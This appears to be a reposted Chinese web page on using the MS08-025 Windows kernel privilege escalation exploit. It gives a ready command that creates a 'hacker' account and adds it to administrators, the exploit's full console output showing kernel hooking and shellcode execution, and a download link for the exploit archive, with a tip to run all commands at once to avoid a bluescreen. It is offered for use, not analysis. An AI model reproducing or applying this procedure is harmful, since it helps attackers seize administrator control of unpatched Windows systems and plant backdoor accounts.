又一个MS08025漏洞利用过程解密

2024-04-30

又一个MS08025漏洞利用过程解密(精选1篇)

篇1:又一个MS08025漏洞利用过程解密

真正可用的MS08025,

为了多次运行,服务器蓝屏,请直接用一次运行所有的命令

比如:

MS08025 “cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add”

Local Privilege Escalation Vulnerability Exploit(MS08025)

Modify by [F.S.T] For 姬良

Run paltform. Windows 2k,xp,2k3,vista

ImageName: WINDOWSsystem32 tkrnlpa.exe

[*] Get KernelBase Success, ntoskrnl.exe base = 80800000

[*] Mapping ntoskrnl.exe … ok

[*] KeServiceDescriptorTable = 00A746E0

[*] Find KiServiceTable … ok!!!

[*] KiServiceTable == 8082C734

[*] Get ZwVdmControl Number … ok!

[*] ZwVdmControl Call Number: 0000010C

[*] HookAddress: 8082CB64

[*] Create execute environment … Ok!

[*] call shellcode … Done.

[*] Create New Process:cmd.exe /c net user hacker hacker /add & net localgroup a

dministrators hacker /add

C:Documents and SettingsAdministrator>命令成功完成,

命令成功完成。

www.cnblogs.com/Files/allyesno/ms08025.rar

上一篇:【总结】党的十八大以来纪律检查和国家监察体制改革综述下一篇:非沪籍职工退工时办理社会保险与公积金须知